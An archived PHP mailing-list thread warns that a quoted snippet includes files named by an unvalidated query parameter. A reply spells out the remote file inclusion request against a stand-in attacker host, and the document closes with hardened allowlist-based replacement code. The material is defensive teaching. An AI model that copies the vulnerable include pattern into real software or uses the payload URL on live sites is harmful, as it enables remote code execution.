> Date: Thu, 15 Nov 2007 00:20:52 +0000
> From: stuttle@xxxxxxxxx
> To: philthathril@xxxxxxxxx
> CC: php-general@xxxxxxxxxxxxx
> Subject: Re: file_exists
>
> Philip Thompson wrote:
>> I've run into similar problems where I *thought* I was looking in the
>> correct location... but I wasn't. Take this for example....
>>
>> <?php
>> // $page comes straight from the query string, unvalidated
>> $page = $_GET['page'];
>> if (file_exists ("$page.php")) {
>>     include ("$page.php");
>> }
>> ?>
>
> I really hope this is not a piece of production code. If it is then you
> might want to think very hard about what it's doing. If you still can't
> see a problem let me know!
>
> -Stut
>
> --
> http://stut.net/
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>

Called like this?

index.php?page=http://evil-hacker-site.com/evil-payload.php

And the browser will probably url_encode for me if needed.
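For contrast with the snippet quoted in the thread, here is an added example (not code from the thread or from either poster) of how the same "include a page named in the query string" feature can be written so that the request shown above is rejected before the filesystem is consulted. It assumes the includable pages live in a `pages/` directory beside the script and that the page names in `ALLOWED_PAGES` and the helper name `resolvePage` are this example's own choices.

```php
<?php
// Added example, not from the thread: a hardened replacement for the
// include-from-$_GET pattern. Assumes includable pages live in pages/
// next to this script; the allowlist contents are illustrative.

declare(strict_types=1);

const PAGES_DIR = __DIR__ . '/pages';

// Explicit allowlist of page names that may be included. Anything not
// listed is rejected without touching the filesystem.
const ALLOWED_PAGES = ['home', 'about', 'contact'];

/**
 * Resolve a user-supplied page name to a file path inside PAGES_DIR,
 * or return null if the request must be refused.
 */
function resolvePage(string $requested): ?string
{
    // 1. Shape check: a short bare name only. No slashes, dots or colons,
    //    so neither "http://..." nor "../" can pass this point.
    if (preg_match('/\A[a-z][a-z0-9_-]{0,31}\z/', $requested) !== 1) {
        return null;
    }

    // 2. Allowlist check: the name must be one we explicitly serve.
    if (!in_array($requested, ALLOWED_PAGES, true)) {
        return null;
    }

    // 3. Canonicalise and confirm the resolved file really sits inside
    //    PAGES_DIR. realpath() returns false for a missing file, which
    //    also replaces the file_exists() call from the quoted snippet.
    $candidate = realpath(PAGES_DIR . '/' . $requested . '.php');
    $base      = realpath(PAGES_DIR);
    if ($candidate === false || $base === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }

    return $candidate;
}

$requested = (string) ($_GET['page'] ?? 'home');
$path      = resolvePage($requested);

if ($path === null) {
    http_response_code(404);
    echo 'Page not found';
    exit;
}

include $path;
```

The three checks are deliberately layered: the regular expression alone would already stop a URL or a `../` sequence, the allowlist stops any file in `pages/` that was never meant to be reachable, and the `realpath()` prefix comparison guards against symlinks or future changes that relax the first two. Whether `allow_url_include` is off in `php.ini` matters for the remote case in the quoted request, but it does nothing for local files, which is why the name is constrained rather than just the scheme.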